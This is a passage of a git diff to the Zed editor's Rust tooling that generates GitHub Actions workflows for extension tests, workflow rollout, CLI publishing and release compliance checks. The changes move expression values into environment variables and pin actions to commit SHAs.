.add_step(get_package) + .add_step(cargo_fmt_package(&package_name)) + .add_step(run_clippy(&package_name)) .add_step(steps::cargo_install_nextest()) - .add_step( - steps::cargo_nextest(runners::Platform::Linux) - // Set the target to the current platform again - 
.with_target("$(rustc -vV | sed -n 's|host: ||p')") - .add_env(("NEXTEST_NO_TESTS", "warn")), - ); + .add_step(run_nextest(&package_name)); named::job(job) } @@ -86,6 +136,7 @@ pub(crate) fn check_extension() -> NamedJob { let (check_version_job, version_changed, _) = compare_versions(); let job = Job::default() + .defaults(extension_job_defaults()) .with_repository_owner_guard() .runs_on(runners::LINUX_LARGE_RAM) .timeout_minutes(6u32) @@ -94,6 +145,8 @@ pub(crate) fn check_extension() -> NamedJob { .add_step(download_zed_extension_cli(cache_hit)) .add_step(cache_rust_dependencies_namespace()) // Extensions can compile Rust, so provide the cache if needed. .add_step(check()) + .add_step(fetch_ts_query_ls()) + .add_step(run_ts_query_ls()) .add_step(check_version_job) .add_step(verify_version_did_not_change(version_changed)); @@ -120,8 +173,8 @@ pub fn download_zed_extension_cli(cache_hit: StepOutput) -> Step { named::bash( indoc! { r#" - wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" - chmod +x zed-extension + wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension" + chmod +x "$GITHUB_WORKSPACE/zed-extension" "#, } ).if_condition(Expression::new(format!("{} != 'true'", cache_hit.expr()))) @@ -132,18 +185,20 @@ pub fn check() -> Step { r#" mkdir -p /tmp/ext-scratch mkdir -p /tmp/ext-output - ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output "# }) } fn verify_version_did_not_change(version_changed: StepOutput) -> Step { - named::bash(formatdoc! 
{r#" - if [[ {version_changed} == "true" && "${{{{ github.event_name }}}}" == "pull_request" && "${{{{ github.event.pull_request.user.login }}}}" != "zed-zippy[bot]" ]] ; then + named::bash(indoc! {r#" + if [[ "$VERSION_CHANGED" == "true" && "$GITHUB_EVENT_NAME" == "pull_request" && "$PR_USER_LOGIN" != "zed-zippy[bot]" ]] ; then echo "Version change detected in your change!" echo "Version changes happen in separate PRs and will be performed by the zed-zippy bot" exit 42 fi "# }) + .add_env(("VERSION_CHANGED", version_changed.to_string())) + .add_env(("PR_USER_LOGIN", "${{ github.event.pull_request.user.login }}")) } diff --git a/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs b/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs index 2ba6069c273e8a3e9a27885595d2ad5380748cdd..1145cf2b5a70c30ac7212f6002e653d1396d55c4 100644 --- a/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs +++ b/tooling/xtask/src/tasks/workflows/extension_workflow_rollout.rs @@ -6,46 +6,74 @@ use indoc::indoc; use serde_json::json; use crate::tasks::workflows::steps::CheckoutStep; +use crate::tasks::workflows::steps::TokenPermissions; +use crate::tasks::workflows::steps::cache_rust_dependencies_namespace; +use crate::tasks::workflows::vars::JobOutput; use crate::tasks::workflows::{ - extension_bump::{RepositoryTarget, generate_token}, runners, - steps::{self, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, named}, - vars::{self, StepOutput}, + steps::{ + self, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, RepositoryTarget, generate_token, named, + }, + vars::{self, StepOutput, WorkflowInput}, }; const ROLLOUT_TAG_NAME: &str = "extension-workflows"; +const WORKFLOW_ARTIFACT_NAME: &str = "extension-workflow-files"; pub(crate) fn extension_workflow_rollout() -> Workflow { - let fetch_repos = fetch_extension_repos(); - let rollout_workflows = rollout_workflows_to_extension(&fetch_repos); - let create_tag = create_rollout_tag(&rollout_workflows); + let 
filter_repos_input = WorkflowInput::string("filter-repos", Some(String::new())) + .description( + "Comma-separated list of repository names to rollout to. Leave empty for all repos.", + ); + let extra_context_input = WorkflowInput::string("change-description", Some(String::new())) + .description("Description for the changes to be expected with this rollout"); + + let (fetch_repos, removed_ci, removed_shared) = fetch_extension_repos(&filter_repos_input); + let rollout_workflows = rollout_workflows_to_extension( + &fetch_repos, + removed_ci, + removed_shared, + &extra_context_input, + ); + let create_tag = create_rollout_tag(&rollout_workflows, &filter_repos_input); named::workflow() - .on(Event::default().workflow_dispatch(WorkflowDispatch::default())) + .on(Event::default().workflow_dispatch( + WorkflowDispatch::default() + .add_input(filter_repos_input.name, filter_repos_input.input()) + .add_input(extra_context_input.name, extra_context_input.input()), + )) .add_env(("CARGO_TERM_COLOR", "always")) .add_job(fetch_repos.name, fetch_repos.job) .add_job(rollout_workflows.name, rollout_workflows.job) .add_job(create_tag.name, create_tag.job) } -fn fetch_extension_repos() -> NamedJob { - fn get_repositories() -> (Step, StepOutput) { - let step = named::uses("actions", "github-script", "v7") +fn fetch_extension_repos(filter_repos_input: &WorkflowInput) -> (NamedJob, JobOutput, JobOutput) { + fn get_repositories(filter_repos_input: &WorkflowInput) -> (Step, StepOutput) { + let step = named::uses("actions", "github-script", "f28e40c7f34bde8b3046d885e986cb6290c5673b") .id("list-repos") .add_with(( "script", - indoc::indoc! {r#" - const repos = await github.paginate(github.rest.repos.listForOrg, { + formatdoc! 
{r#" + const repos = await github.paginate(github.rest.repos.listForOrg, {{ org: 'zed-extensions', type: 'public', per_page: 100, - }); + }}); - const filteredRepos = repos + let filteredRepos = repos .filter(repo => !repo.archived) .map(repo => repo.name); - console.log(`Found ${filteredRepos.length} extension repos`); + const filterInput = `{filter_repos_input}`.trim(); + if (filterInput.length > 0) {{ + const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0); + filteredRepos = filteredRepos.filter(name => allowedNames.includes(name)); + console.log(`Filter applied. Matched ${{filteredRepos.length}} repos from ${{allowedNames.length}} requested.`); + }} + + console.log(`Found ${{filteredRepos.length}} extension repos`); return filteredRepos; "#}, )) @@ -56,36 +84,12 @@ fn fetch_extension_repos() -> NamedJob { (step, filtered_repos) } - let (get_org_repositories, list_repos_output) = get_repositories(); - - let job = Job::default() - .cond(Expression::new(format!( - "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'" - ))) - .runs_on(runners::LINUX_SMALL) - .timeout_minutes(5u32) - .outputs([("repos".to_owned(), list_repos_output.to_string())]) - .add_step(get_org_repositories); - - named::job(job) -} - -fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { fn checkout_zed_repo() -> CheckoutStep { steps::checkout_repo() .with_full_history() - .with_path("zed") .with_custom_name("checkout_zed_repo") } - fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep { - steps::checkout_repo() - .with_custom_name("checkout_extension_repo") - .with_token(token) - .with_repository("zed-extensions/${{ matrix.repo }}") - .with_path("extension") - } - fn get_previous_tag_commit() -> (Step, StepOutput) { let step = named::bash(formatdoc! 
{r#" PREV_COMMIT=$(git rev-parse "{ROLLOUT_TAG_NAME}^{{commit}}" 2>/dev/null || echo "") @@ -96,51 +100,127 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { echo "Found previous rollout at commit: $PREV_COMMIT" echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" "#}) - .id("prev-tag") - .working_directory("zed"); + .id("prev-tag"); let step_output = StepOutput::new(&step, "prev_commit"); (step, step_output) } - fn get_removed_files(prev_commit: &StepOutput) -> (Step, StepOutput) { - let step = named::bash(formatdoc! {r#" - PREV_COMMIT="{prev_commit}" + fn get_removed_files(prev_commit: &StepOutput) -> (Step, StepOutput, StepOutput) { + let step = named::bash(indoc! {r#" + for workflow_type in "ci" "shared"; do + if [ "$workflow_type" = "ci" ]; then + WORKFLOW_DIR="extensions/workflows" + else + WORKFLOW_DIR="extensions/workflows/shared" + fi + + REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ + awk '/^D/ { print $2 } /^R/ { print $2 }' | \ + xargs -I{} basename {} 2>/dev/null | \ + tr '\n' ' ' || echo "") + REMOVED=$(echo "$REMOVED" | xargs) + + echo "Removed files for $workflow_type: $REMOVED" + echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT" + done + "#}) + .id("calc-changes") + .add_env(("PREV_COMMIT", prev_commit.to_string())); - if [ "${{{{ matrix.repo }}}}" = "workflows" ]; then - WORKFLOW_DIR="extensions/workflows" - else - WORKFLOW_DIR="extensions/workflows/shared" - fi + // These are created in the for-loop above and thus do exist + let removed_ci = StepOutput::new_unchecked(&step, "removed_ci"); + let removed_shared = StepOutput::new_unchecked(&step, "removed_shared"); - echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR" + (step, removed_ci, removed_shared) + } - # Get deleted files (status D) and renamed files (status R - old name needs removal) - # Using -M to detect renames, then extracting files that are gone from their original location - REMOVED_FILES=$(git 
diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ - awk '/^D/ {{ print $2 }} /^R/ {{ print $2 }}' | \ - xargs -I{{}} basename {{}} 2>/dev/null | \ - tr '\n' ' ' || echo "") + fn generate_workflow_files() -> Step { + named::bash(indoc! {r#" + cargo xtask workflows "$COMMIT_SHA" + "#}) + .add_env(("COMMIT_SHA", "${{ github.sha }}")) + } - REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs) + fn upload_workflow_files() -> Step { + named::uses( + "actions", + "upload-artifact", + "330a01c490aca151604b8cf639adc76d48f6c5d4", // v5 + ) + .add_with(("name", WORKFLOW_ARTIFACT_NAME)) + .add_with(("path", "extensions/workflows/**/*.yml")) + .add_with(("if-no-files-found", "error")) + } - echo "Files to remove: $REMOVED_FILES" - echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT" - "#}) - .id("calc-changes") - .working_directory("zed"); + let (get_org_repositories, list_repos_output) = get_repositories(filter_repos_input); + let (get_prev_tag, prev_commit) = get_previous_tag_commit(); + let (calc_changes, removed_ci, removed_shared) = get_removed_files(&prev_commit); - let removed_files = StepOutput::new(&step, "removed_files"); + let job = Job::default() + .cond(Expression::new(format!( + "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'" + ))) + .runs_on(runners::LINUX_SMALL) + .timeout_minutes(10u32) + .outputs([ + ("repos".to_owned(), list_repos_output.to_string()), + ("prev_commit".to_owned(), prev_commit.to_string()), + ("removed_ci".to_owned(), removed_ci.to_string()), + ("removed_shared".to_owned(), removed_shared.to_string()), + ]) + .add_step(checkout_zed_repo()) + .add_step(get_prev_tag) + .add_step(calc_changes) + .add_step(get_org_repositories) + .add_step(cache_rust_dependencies_namespace()) + .add_step(generate_workflow_files()) + .add_step(upload_workflow_files()); + + let job = named::job(job); + let (removed_ci, removed_shared) = ( + removed_ci.as_job_output(&job), + removed_shared.as_job_output(&job), + ); + + (job, 
removed_ci, removed_shared) +} - (step, removed_files) +fn rollout_workflows_to_extension( + fetch_repos_job: &NamedJob, + removed_ci: JobOutput, + removed_shared: JobOutput, + extra_context_input: &WorkflowInput, +) -> NamedJob { + fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep { + steps::checkout_repo() + .with_custom_name("checkout_extension_repo") + .with_token(token) + .with_repository("zed-extensions/${{ matrix.repo }}") + .with_path("extension") } - fn sync_workflow_files(removed_files: &StepOutput) -> Step { - named::bash(formatdoc! {r#" - REMOVED_FILES="{removed_files}" + fn download_workflow_files() -> Step { + named::uses( + "actions", + "download-artifact", + "018cc2cf5baa6db3ef3c5f8a56943fffe632ef53", // v6.0.0 + ) + .add_with(("name", WORKFLOW_ARTIFACT_NAME)) + .add_with(("path", "workflow-files")) + } + fn sync_workflow_files(removed_ci: JobOutput, removed_shared: JobOutput) -> Step { + named::bash(indoc! {r#" mkdir -p extension/.github/workflows + + if [ "$MATRIX_REPO" = "workflows" ]; then + REMOVED_FILES="$REMOVED_CI" + else + REMOVED_FILES="$REMOVED_SHARED" + fi + cd extension/.github/workflows if [ -n "$REMOVED_FILES" ]; then @@ -153,80 +233,95 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { cd - > /dev/null - if [ "${{{{ matrix.repo }}}}" = "workflows" ]; then - cp zed/extensions/workflows/*.yml extension/.github/workflows/ + if [ "$MATRIX_REPO" = "workflows" ]; then + cp workflow-files/*.yml extension/.github/workflows/ else - cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/ + cp workflow-files/shared/*.yml extension/.github/workflows/ fi "#}) + .add_env(("REMOVED_CI", removed_ci)) + .add_env(("REMOVED_SHARED", removed_shared)) + .add_env(("MATRIX_REPO", "${{ matrix.repo }}")) } fn get_short_sha() -> (Step, StepOutput) { - let step = named::bash(indoc::indoc! {r#" - echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT" + let step = named::bash(indoc! 
{r#" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" "#}) - .id("short-sha") - .working_directory("zed"); + .id("short-sha"); let step_output = StepOutput::new(&step, "sha_short"); (step, step_output) } - fn create_pull_request(token: &StepOutput, short_sha: &StepOutput) -> Step { + fn create_pull_request( + token: &StepOutput, + short_sha: &StepOutput, + context_input: &WorkflowInput, + ) -> Step { let title = format!("Update CI workflows to `{short_sha}`"); - named::uses("peter-evans", "create-pull-request", "v7") - .add_with(("path", "extension")) - .add_with(("title", title.clone())) - .add_with(( - "body", - indoc::indoc! {r#" - This PR updates the CI workflow files from the main Zed repository - based on the commit zed-industries/zed@${{ github.sha }} - "#}, - )) - .add_with(("commit-message", title)) - .add_with(("branch", "update-workflows")) - .add_with(( - "committer", - "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", - )) - .add_with(( - "author", - "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", - )) - .add_with(("base", "main")) - .add_with(("delete-branch", true)) - .add_with(("token", token.to_string())) - .add_with(("sign-commits", true)) - .id("create-pr") + let body = formatdoc! 
{r#" + This PR updates the CI workflow files from the main Zed repository + based on the commit zed-industries/zed@${{{{ github.sha }}}} + + {context_input} + "#, + }; + + named::uses( + "peter-evans", + "create-pull-request", + "98357b18bf14b5342f975ff684046ec3b2a07725", + ) + .add_with(("path", "extension")) + .add_with(("title", title.clone())) + .add_with(("body", body)) + .add_with(("commit-message", title)) + .add_with(("branch", "update-workflows")) + .add_with(( + "committer", + "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", + )) + .add_with(( + "author", + "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", + )) + .add_with(("base", "main")) + .add_with(("delete-branch", true)) + .add_with(("token", token.to_string())) + .add_with(("sign-commits", true)) + .id("create-pr") } fn enable_auto_merge(token: &StepOutput) -> Step { - named::bash(indoc::indoc! {r#" - PR_NUMBER="${{ steps.create-pr.outputs.pull-request-number }}" + named::bash(indoc! 
{r#" if [ -n "$PR_NUMBER" ]; then - cd extension gh pr merge "$PR_NUMBER" --auto --squash fi "#}) + .working_directory("extension") .add_env(("GH_TOKEN", token.to_string())) + .add_env(( + "PR_NUMBER", + "${{ steps.create-pr.outputs.pull-request-number }}", + )) } - let (authenticate, token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some( - RepositoryTarget::new("zed-extensions", &["${{ matrix.repo }}"]).permissions([ - ("permission-pull-requests".to_owned(), Level::Write), - ("permission-contents".to_owned(), Level::Write), - ("permission-workflows".to_owned(), Level::Write), - ]), - ), - ); - let (get_prev_tag, prev_commit) = get_previous_tag_commit(); - let (calc_changes, removed_files) = get_removed_files(&prev_commit); + let (authenticate, token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) + .for_repository(RepositoryTarget::new( + "zed-extensions", + &["${{ matrix.repo }}"], + )) + .with_permissions([ + (TokenPermissions::PullRequests, Level::Write), + (TokenPermissions::Contents, Level::Write), + (TokenPermissions::Workflows, Level::Write), + ]) + .into(); + let (calculate_short_sha, short_sha) = get_short_sha(); let job = Job::default() @@ -246,19 +341,17 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob { })), ) .add_step(authenticate) - .add_step(checkout_zed_repo()) .add_step(checkout_extension_repo(&token)) - .add_step(get_prev_tag) - .add_step(calc_changes) - .add_step(sync_workflow_files(&removed_files)) + .add_step(download_workflow_files()) + .add_step(sync_workflow_files(removed_ci, removed_shared)) .add_step(calculate_short_sha) - .add_step(create_pull_request(&token, &short_sha)) + .add_step(create_pull_request(&token, &short_sha, extra_context_input)) .add_step(enable_auto_merge(&token)); named::job(job) } -fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob { +fn create_rollout_tag(rollout_job: &NamedJob, filter_repos_input: &WorkflowInput) 
-> NamedJob { fn checkout_zed_repo(token: &StepOutput) -> CheckoutStep { steps::checkout_repo().with_full_history().with_token(token) } @@ -283,17 +376,18 @@ fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob { "#}) } - let (authenticate, token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some( - RepositoryTarget::current() - .permissions([("permission-contents".to_owned(), Level::Write)]), - ), - ); + let (authenticate, token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) + .for_repository(RepositoryTarget::current()) + .with_permissions([(TokenPermissions::Contents, Level::Write)]) + .into(); let job = Job::default() .needs([rollout_job.name.clone()]) + .cond(Expression::new(format!( + "{filter_repos} == ''", + filter_repos = filter_repos_input.expr(), + ))) .runs_on(runners::LINUX_SMALL) .timeout_minutes(1u32) .add_step(authenticate) diff --git a/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs b/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs index 2d82f1351f21645a77b1d13e158bd4142dbec069..4dc2560e2bea489566fb8eb5ad5d04701835de29 100644 --- a/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs +++ b/tooling/xtask/src/tasks/workflows/extensions/bump_version.rs @@ -5,17 +5,18 @@ use gh_workflow::{ use indoc::indoc; use crate::tasks::workflows::{ + GenerateWorkflowArgs, GitSha, extensions::WithAppSecrets, runners, steps::{CommonJobConditions, NamedJob, named}, vars::{JobOutput, StepOutput, one_workflow_per_non_main_branch_and_token}, }; -pub(crate) fn bump_version() -> Workflow { +pub(crate) fn bump_version(args: &GenerateWorkflowArgs) -> Workflow { let (determine_bump_type, bump_type) = determine_bump_type(); let bump_type = bump_type.as_job_output(&determine_bump_type); - let call_bump_version = call_bump_version(&determine_bump_type, bump_type); + let call_bump_version = call_bump_version(args.sha.as_ref(), &determine_bump_type, bump_type); 
named::workflow() .on(Event::default() @@ -32,6 +33,7 @@ pub(crate) fn bump_version() -> Workflow { } pub(crate) fn call_bump_version( + target_ref: Option<&GitSha>, depending_job: &NamedJob, bump_type: JobOutput, ) -> NamedJob { @@ -51,7 +53,7 @@ pub(crate) fn call_bump_version( "zed-industries", "zed", ".github/workflows/extension_bump.yml", - "main", + target_ref.map_or("main", AsRef::as_ref), ) .add_need(depending_job.name.clone()) .with( diff --git a/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs b/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs index 0c0ca696612fa57903f35c0ea69404f5dc7d1fe0..ae8000c15cad3a206b9c02f8bc389a369f4df096 100644 --- a/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs +++ b/tooling/xtask/src/tasks/workflows/extensions/run_tests.rs @@ -1,12 +1,13 @@ use gh_workflow::{Event, Job, Level, Permissions, PullRequest, Push, UsesJob, Workflow}; use crate::tasks::workflows::{ + GenerateWorkflowArgs, GitSha, steps::{NamedJob, named}, vars::one_workflow_per_non_main_branch_and_token, }; -pub(crate) fn run_tests() -> Workflow { - let call_extension_tests = call_extension_tests(); +pub(crate) fn run_tests(args: &GenerateWorkflowArgs) -> Workflow { + let call_extension_tests = call_extension_tests(args.sha.as_ref()); named::workflow() .on(Event::default() .pull_request(PullRequest::default().add_branch("**")) @@ -15,14 +16,14 @@ pub(crate) fn run_tests() -> Workflow { .add_job(call_extension_tests.name, call_extension_tests.job) } -pub(crate) fn call_extension_tests() -> NamedJob { +pub(crate) fn call_extension_tests(target_ref: Option<&GitSha>) -> NamedJob { let job = Job::default() .permissions(Permissions::default().contents(Level::Read)) .uses( "zed-industries", "zed", ".github/workflows/extension_tests.yml", - "main", + target_ref.map_or("main", AsRef::as_ref), ); named::job(job) diff --git a/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs b/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs 
index 549b0fdfcfbb8f44b24ac849e2fe3c13bf5acdb0..9f8d054241507af8597e2ff328263c440377686f 100644 --- a/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs +++ b/tooling/xtask/src/tasks/workflows/publish_extension_cli.rs @@ -2,9 +2,8 @@ use gh_workflow::{ctx::Context, *}; use indoc::indoc; use crate::tasks::workflows::{ - extension_bump::{RepositoryTarget, generate_token}, runners, - steps::{self, CommonJobConditions, NamedJob, named}, + steps::{self, CommonJobConditions, NamedJob, RepositoryTarget, generate_token, named}, vars::{self, StepOutput}, }; @@ -28,7 +27,7 @@ fn publish_job() -> NamedJob { } fn upload_binary() -> Step { - named::bash("script/upload-extension-cli ${{ github.sha }}") + named::bash(r#"script/upload-extension-cli "$GITHUB_SHA""#) .add_env(( "DIGITALOCEAN_SPACES_ACCESS_KEY", vars::DIGITALOCEAN_SPACES_ACCESS_KEY, @@ -42,7 +41,7 @@ fn publish_job() -> NamedJob { named::job( Job::default() .with_repository_owner_guard() - .runs_on(runners::LINUX_SMALL) + .runs_on(runners::LINUX_DEFAULT) .add_step(steps::checkout_repo()) .add_step(steps::cache_rust_dependencies_namespace()) .add_step(steps::setup_linux()) @@ -52,15 +51,12 @@ fn publish_job() -> NamedJob { } fn update_sha_in_zed(publish_job: &NamedJob) -> NamedJob { - let (generate_token, generated_token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some(RepositoryTarget::current()), - ); + let (generate_token, generated_token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY).into(); fn replace_sha() -> Step { named::bash(indoc! 
{r#" - sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"${{ github.sha }}\"/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: &str = \"[a-f0-9]*\"/ZED_EXTENSION_CLI_SHA: \&str = \"$GITHUB_SHA\"/" \ tooling/xtask/src/tasks/workflows/extension_tests.rs "#}) } @@ -92,7 +88,7 @@ fn create_pull_request_zed(generated_token: &StepOutput, short_sha: &StepOutput) short_sha ); - named::uses("peter-evans", "create-pull-request", "v7").with( + named::uses("peter-evans", "create-pull-request", "98357b18bf14b5342f975ff684046ec3b2a07725").with( Input::default() .add("title", title.clone()) .add( @@ -121,11 +117,10 @@ fn create_pull_request_zed(generated_token: &StepOutput, short_sha: &StepOutput) fn update_sha_in_extensions(publish_job: &NamedJob) -> NamedJob { let extensions_repo = RepositoryTarget::new("zed-industries", &["extensions"]); - let (generate_token, generated_token) = generate_token( - vars::ZED_ZIPPY_APP_ID, - vars::ZED_ZIPPY_APP_PRIVATE_KEY, - Some(extensions_repo), - ); + let (generate_token, generated_token) = + generate_token(vars::ZED_ZIPPY_APP_ID, vars::ZED_ZIPPY_APP_PRIVATE_KEY) + .for_repository(extensions_repo) + .into(); fn checkout_extensions_repo(token: &StepOutput) -> Step { named::uses( @@ -139,7 +134,7 @@ fn update_sha_in_extensions(publish_job: &NamedJob) -> NamedJob { fn replace_sha() -> Step { named::bash(indoc! 
{r#" - sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: ${{ github.sha }}/" \ + sed -i "s/ZED_EXTENSION_CLI_SHA: [a-f0-9]*/ZED_EXTENSION_CLI_SHA: $GITHUB_SHA/" \ .github/workflows/ci.yml "#}) } @@ -165,7 +160,7 @@ fn create_pull_request_extensions( ) -> Step { let title = format!("Bump extension CLI version to `{}`", short_sha); - named::uses("peter-evans", "create-pull-request", "v7").with( + named::uses("peter-evans", "create-pull-request", "98357b18bf14b5342f975ff684046ec3b2a07725").with( Input::default() .add("title", title.clone()) .add( @@ -191,7 +186,7 @@ fn create_pull_request_extensions( fn get_short_sha() -> (Step, StepOutput) { let step = named::bash(indoc::indoc! {r#" - echo "sha_short=$(echo "${{ github.sha }}" | cut -c1-7)" >> "$GITHUB_OUTPUT" + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" "#}) .id("short-sha"); diff --git a/tooling/xtask/src/tasks/workflows/release.rs b/tooling/xtask/src/tasks/workflows/release.rs index 8241fc58f0821b950e32ee9b1a42473975ec008d..3efe3e7c5c127e8580a9ca22d2d0e1ab4e7c80e9 100644 --- a/tooling/xtask/src/tasks/workflows/release.rs +++ b/tooling/xtask/src/tasks/workflows/release.rs @@ -1,11 +1,13 @@ -use gh_workflow::{Event, Expression, Push, Run, Step, Use, Workflow, ctx::Context}; +use gh_workflow::{Event, Expression, Job, Push, Run, Step, Use, Workflow, ctx::Context}; use indoc::formatdoc; use crate::tasks::workflows::{ run_bundling::{bundle_linux, bundle_mac, bundle_windows}, run_tests, runners::{self, Arch, Platform}, - steps::{self, FluentBuilder, NamedJob, dependant_job, named, release_job}, + steps::{ + self, CommonJobConditions, FluentBuilder, NamedJob, dependant_job, named, release_job, + }, vars::{self, StepOutput, assets}, }; @@ -16,12 +18,13 @@ pub(crate) fn release() -> Workflow { let macos_tests = run_tests::run_platform_tests_no_filter(Platform::Mac); let linux_tests = run_tests::run_platform_tests_no_filter(Platform::Linux); let windows_tests = 
run_tests::run_platform_tests_no_filter(Platform::Windows); - let macos_clippy = run_tests::clippy(Platform::Mac); - let linux_clippy = run_tests::clippy(Platform::Linux); - let windows_clippy = run_tests::clippy(Platform::Windows); + let macos_clippy = run_tests::clippy(Platform::Mac, None); + let linux_clippy = run_tests::clippy(Platform::Linux, None); + let windows_clippy = run_tests::clippy(Platform::Windows, None); let check_scripts = run_tests::check_scripts(); let create_draft_release = create_draft_release(); + let compliance = compliance_check(); let bundle = ReleaseBundleJobs { linux_aarch64: bundle_linux( @@ -92,6 +95,7 @@ pub(crate) fn release() -> Workflow { .add_job(windows_clippy.name, windows_clippy.job) .add_job(check_scripts.name, check_scripts.job) .add_job(create_draft_release.name, create_draft_release.job) + .add_job(compliance.name, compliance.job) .map(|mut workflow| { for job in bundle.into_jobs() { workflow = workflow.add_job(job.name, job.job); @@ -149,6 +153,59 @@ pub(crate) fn create_sentry_release() -> Step { .add_with(("environment", "production")) } +fn compliance_check() -> NamedJob { + fn run_compliance_check() -> Step { + named::bash( + r#"cargo xtask compliance "$GITHUB_REF_NAME" --report-path "$COMPLIANCE_FILE_OUTPUT""#, + ) + .id("run-compliance-check") + .add_env(("GITHUB_APP_ID", vars::ZED_ZIPPY_APP_ID)) + .add_env(("GITHUB_APP_KEY", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) + } + + fn send_compliance_slack_notification() -> Step { + named::bash(indoc::indoc! 
{r#" + if [ "$COMPLIANCE_OUTCOME" == "success" ]; then + STATUS="✅ Compliance check passed for $GITHUB_REF_NAME" + else + STATUS="❌ Compliance check failed for $GITHUB_REF_NAME" + fi + + REPORT_CONTENT="" + if [ -f "$COMPLIANCE_FILE_OUTPUT" ]; then + REPORT_CONTENT=$(cat "$REPORT_FILE") + fi + + MESSAGE=$(printf "%s\n\n%s" "$STATUS" "$REPORT_CONTENT") + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + "#}) + .if_condition(Expression::new("always()")) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(( + "COMPLIANCE_OUTCOME", + "${{ steps.run-compliance-check.outcome }}", + )) + } + + named::job( + Job::default() + .add_env(("COMPLIANCE_FILE_PATH", "compliance.md")) + .with_repository_owner_guard() + .runs_on(runners::LINUX_DEFAULT) + .add_step( + steps::checkout_repo() + .with_full_history() + .with_ref(Context::github().ref_()), + ) + .add_step(steps::cache_rust_dependencies_namespace()) + .add_step(run_compliance_check()) + .add_step(send_compliance_slack_notification()), + ) +} + fn validate_release_assets(deps: &[&NamedJob]) -> NamedJob { let expected_assets: Vec = assets::all().iter().map(|a| format!("\"{a}\"")).collect(); let expected_assets_json = format!("[{}]", expected_assets.join(", ")); @@ -171,15 +228,59 @@ fn validate_release_assets(deps: &[&NamedJob]) -> NamedJob { "#, }; + fn run_post_upload_compliance_check() -> Step { + named::bash( + r#"cargo xtask compliance "$GITHUB_REF_NAME" --report-path target/compliance-report"#, + ) + .id("run-post-upload-compliance-check") + .add_env(("GITHUB_APP_ID", vars::ZED_ZIPPY_APP_ID)) + .add_env(("GITHUB_APP_KEY", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) + } + + fn send_post_upload_compliance_notification() -> Step { + named::bash(indoc::indoc! 
